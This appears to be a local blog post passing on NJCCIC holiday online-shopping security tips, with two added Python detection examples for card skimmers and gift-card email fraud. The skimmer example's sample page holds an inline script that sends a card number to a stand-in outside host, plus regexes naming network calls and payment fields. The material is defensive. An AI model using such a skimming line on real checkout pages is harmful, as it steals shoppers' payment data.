the staff of the Ridgewood blog and the DHS
Ridgewood NJ, during the 2022 holiday season, consumers spent approximately $936.3 billion, an increase of over five percent from the previous year. Online and other non-store shopping increased 9.5 percent, totaling $261.6 billion. On Cyber Monday alone, consumers spent a record $11.3 billion. This year, total sales are expected to increase moderately, by about three percent, given the rising costs of goods and services due to inflation and other factors, and consumers may choose to spread their holiday shopping over a longer period of time – in 2022, 49 percent of consumers started their holiday shopping before November. While predictions for total sales are debated, one thing is certain – cybercriminals will continue to target online shoppers and marketplaces for financial gain. As consumers may be especially motivated to find deals, specials, and discounts when purchasing gifts this year, it is vital to maintain awareness of the many cyber threats posed by these individuals and groups. Threat actors may target victims through a variety of methods, including compromised or spoofed websites, phishing campaigns, social media ads and messages, or unsecured Wi-Fi networks. Reviewing the common attack vectors detailed in this article, along with the accompanying tips and best practices, will help to combat the threats posed by cybercriminals this holiday season.
Use Payments With Greater Consumer Protections
Magecart attacks are a type of web-based data skimming operation used to capture customer payment card data from the checkout pages of online stores. These attacks are accomplished by gaining access to the targeted website (either directly or through a supply chain attack), injecting malicious JavaScript code into the checkout page to skim the desired data, and sending the information back to a threat actor-controlled server. Magecart attacks are conducted by many threat actors and are not specific to one group. Once payment card data is stolen, it can be used by the threat actors to make fraudulent purchases or sold on dark web or other marketplaces. Cybercriminals are likely to continue to target online marketplaces this year. As such, online shoppers are encouraged to use credit cards over debit cards, as they often have better consumer fraud protections. Some banks also offer merchant-specific “virtual cards” that can be used in lieu of the customer's actual payment card number. Additionally, consider enabling charge notifications for every card transaction, where available. Enabling these notifications may make it easier for a customer to identify a fraudulent transaction as soon as it occurs. If a customer discovers fraudulent activity on their account, they should lock the affected card where this option is available, notify their banking institution immediately, and request a new payment card.
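To show how a site operator might check a checkout page for the kind of injected script described above, here is an added Python example (not from the original article or the NJCCIT/NJCCIC): it parses a constructed checkout page with hypothetical hostnames, flags script sources outside an allowlist of expected hosts, and flags inline scripts that both read payment fields and call a browser network API.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse
# Constructed checkout page with hypothetical hosts: two expected scripts, one
# unexpected third-party script, and an inline block that reads a card field
# and sends it off-site (the pattern a skimmer audit should flag).
SAMPLE_CHECKOUT_HTML = """
<form id="checkout"><input name="cc_number"><input name="cvv"></form>
<script src="https://shop.example/static/checkout.js"></script>
<script src="https://js.payments-provider.example/v1.js"></script>
<script src="https://cdn-stats.example-unknown.net/lib.js"></script>
<script>
  document.getElementById('checkout').addEventListener('submit', function () {
    navigator.sendBeacon('https://collect.example-unknown.net/x',
                         document.querySelector('[name=cc_number]').value);
  });
</script>
"""
ALLOWED_SCRIPT_HOSTS = {"shop.example", "js.payments-provider.example"}
PAYMENT_FIELD_RE = re.compile(r"cc_number|cvv|card|expir", re.I)
NETWORK_API_RE = re.compile(r"sendBeacon|XMLHttpRequest|fetch\(|new Image\(", re.I)

class ScriptCollector(HTMLParser):
    # Collects external script URLs and inline script bodies from a page.
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:  # inline script: start collecting its body
                self._in_script = True
                self.inline.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data

def audit_checkout_page(html, allowed_hosts):
    """Return (kind, detail) findings: off-allowlist hosts and inline skim patterns."""
    p = ScriptCollector()
    p.feed(html)
    hosts = [urlparse(s).hostname or "" for s in p.external]
    findings = [("unexpected_script_host", h) for h in hosts if h not in allowed_hosts]
    findings += [("inline_payment_exfil_pattern", b.strip()[:60]) for b in p.inline
                 if PAYMENT_FIELD_RE.search(b) and NETWORK_API_RE.search(b)]
    return findings
```

Running the audit on a live page's HTML on a schedule and alerting on any new finding catches the unexpected script host before a shopper's card data does.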
Be Wary of Suspicious Emails That Appear Sent From Known Entities or Contacts
Around the holidays, users are likely to receive emails from known retailers regarding sales and coupons, order confirmations, and shipping notices. Cybercriminals can create spoofed emails using stolen retailer branding to make them appear legitimate; these emails may contain links or attachments that install malware or lead recipients to spoofed websites that steal user credentials. These emails may attempt to convey a sense of urgency – “Limited Time Offer!” – to prevent users from thoroughly inspecting the email for red flags. Recently, the NJCCIC has observed Amazon, American Express, and FedEx phishing emails sent to New Jersey state employees in an attempt to steal users’ credentials. Users are advised to navigate directly to retailer websites by typing the legitimate URL into their browser instead of clicking on links in emails, and to refrain from entering login credentials on websites visited via links delivered in emails.
Additionally, individuals may receive an email that appears to be sent from a known contact within their organization asking for a “favor.” These messages often ask whether the recipient is available and then ask them to purchase gift cards on the sender's behalf with the promise to refund them. These emails use display name spoofing to make them appear to come from a known contact and may use formatting to suggest the email is a reply to a previous email thread in an attempt to appear legitimate. The sender will likely frame the request as being related to holiday gifts or donations and instruct the recipient to send them the codes on the back of the gift cards after purchase. These requests may raise less suspicion during the holiday season and could result in a greater rate of victimization.
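As an added example (not part of the original article), the following Python script applies the three tells described above to a constructed message with hypothetical addresses: a display name fronting an address outside the organization's domain, a subject formatted as a reply with no In-Reply-To or References headers, and the gift-card “favor” wording. A mail filter or help-desk triage tool could apply the same checks.

```python
from email import message_from_string
from email.utils import parseaddr

# Constructed sample with hypothetical addresses: a familiar display name on an
# outside free-mail address, a subject dressed up as a reply with no threading
# headers, and the usual gift-card "favor" wording.
SAMPLE_EMAIL = """\
From: "Dana Rivera (Director of Finance)" <dana.rivera.office@freemail.example>
To: staff@agency.example
Subject: RE: quick favor
Date: Mon, 20 Nov 2023 09:14:00 -0500

Are you available? I need you to pick up some gift cards for the holiday
donation drive. Send me the codes on the back once you have them and I will
refund you.
"""
ORG_DOMAINS = {"agency.example"}
GIFT_CARD_PHRASES = ("gift card", "codes on the back", "are you available", "refund you")

def message_text(msg):
    """Plain-text body of a parsed message, for single-part or multipart mail."""
    if not msg.is_multipart():
        return msg.get_payload()
    return " ".join(p.get_payload() for p in msg.walk()
                    if p.get_content_type() == "text/plain")

def bec_gift_card_indicators(raw_message, org_domains):
    """Return the names of the indicators present in a raw RFC 5322 message."""
    msg = message_from_string(raw_message)
    name, addr = parseaddr(msg.get("From", ""))
    sender_domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    subject = msg.get("Subject", "").strip().lower()
    text = (subject + " " + message_text(msg)).lower()
    found = []
    # Display name spoofing: a person-like name fronting an address outside the org
    if name and sender_domain not in org_domains:
        found.append("display_name_on_external_address")
    # Fake reply: "RE:" in the subject but no In-Reply-To / References headers
    if subject.startswith(("re:", "fw:", "fwd:")) and not msg.get("In-Reply-To") \
            and not msg.get("References"):
        found.append("reply_subject_without_thread_headers")
    # Gift card favor wording: two or more of the characteristic phrases
    if sum(phrase in text for phrase in GIFT_CARD_PHRASES) >= 2:
        found.append("gift_card_favor_language")
    return found
```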
Use Caution with Social Media Ads
Users are often faced with ads as they scroll social media platforms. While many of these ads link to known, legitimate vendor websites, users may also be confronted with ads that link to malicious or otherwise suspicious sites that could be used to install malware, steal credentials, or sell counterfeit goods. URL shortening can be employed by cybercriminals to trick users on social media sites and other outlets by hiding the true destination of a link. Users are advised to use a URL expander to reveal the true destination of shortened URLs prior to visiting websites and verify websites are the legitimate vendor prior to making any purchases.
Look Out for Holiday-Themed eCards and Messages Meant to Install Malware
In the past, users reported being targeted with various Thanksgiving Day-related scams. In some cases, spoofed emails were sent appearing to originate from legitimate organizations and contained the subject line “Thanksgiving eCard.” Additionally, an Emotet banking trojan campaign was observed using Thanksgiving lures, such as the subject lines “Happy Thanksgiving Day Greeting Message” and “Thanksgiving Day Card.” As malicious actors commonly leverage public interest and current events to conduct financial fraud and disseminate malware, users are reminded to exercise caution with unexpected or unsolicited emails, especially those with a holiday theme.
Do Your Online Shopping at Home
Avoid using public computers, such as those at a library or hotel, or public Wi-Fi connections to log in to personal accounts or conduct online shopping. Public computers could be infected with malware designed to steal your information and hackers can intercept network traffic traveling over unencrypted Wi-Fi signals. If you must connect to public Wi-Fi, use a virtual private network (VPN) to secure information transmitted between your device and the internet. Additionally, users are advised to refrain from using work computers to make online purchases as cyber threats could endanger company and/or customer information. For information on how to secure your home network, review the NJCCIC guide “Configuring & Securing a Home Wi-Fi Router.”
Enable Multi-Factor Authentication on All Accounts
Be sure to enable multi-factor authentication (MFA) – authentication by combining at least two of the following: something you know, something you have, and something you are – on every account that offers it, as this will greatly reduce the risk of account compromise via credential theft. Even if a cybercriminal obtains a user’s username and password, they will be unable to access that user’s account without their second factor. The NJCCIC encourages users to choose authentication apps, hardware tokens, or biometrics as a second factor over SMS-based authentication due to the risk of SIM-swapping and other MFA bypass techniques, though using any form of MFA is beneficial.
Avoid Connecting Devices to Public Charging Stations
Public charging stations supplied with power cables or USB ports located in stores, airports, libraries, and schools may seem like a convenient way to charge your mobile devices on the go, but can you be sure that your device and data will be safe if you connect? These kiosks can contain concealed computers that attempt to extract data such as contact information, photos, and videos from connected devices, unbeknownst to the user. Additionally, malicious or compromised charging stations can expose devices to the risk of a malware infection. Even if the charging station is not malicious, the manufacturer or owner of the kiosk may require users to input their email addresses or phone numbers in order to charge their devices, potentially exposing them to unwanted marketing campaigns, phishing emails, and scam calls.
Verify Charities Before Donating
It is common around the holidays to donate to charities, particularly those that provide goods and/or services to those individuals and families in need. Users may be prompted to donate via solicitations received through email or social media; however, these could be promoting fake charities or impersonating legitimate charities. Prior to donating, research the charity through a nonprofit site such as charitywatch.org or charitynavigator.org for information on charity legitimacy and other details, such as the percentage of donations that go directly to the associated cause. The Federal Trade Commission (FTC) offers guidance in their ‘How to Donate Wisely and Avoid Charity Scams’ post.
Beware of ‘Secret Sister’ Gift Exchange Scam
Many people enjoy participating in group gift exchanges this time of year; however, beware of potential scams. Social media posts promoting a “Secret Sister” gift exchange promise between 6 and 36 gifts in exchange for sending one gift. While this type of chain letter appears innocent, it is actually illegal and considered a pyramid scheme. The scam, detailed by the Better Business Bureau, begins by requesting the name and address of the recipient and their friends. This holiday season, only participate in gift exchanges with individuals you know personally and refrain from sharing too much personal information online.
We hope everyone has a happy and healthy holiday season!
If you experience a cyber-related incident, you may report it to the NJCCIC via the Cyber Incident Report form. All other scams can be reported to the FTC via their website.
Heck yes! I don’t even answer calls if they are from a number I don’t know. Old school thinking but it works!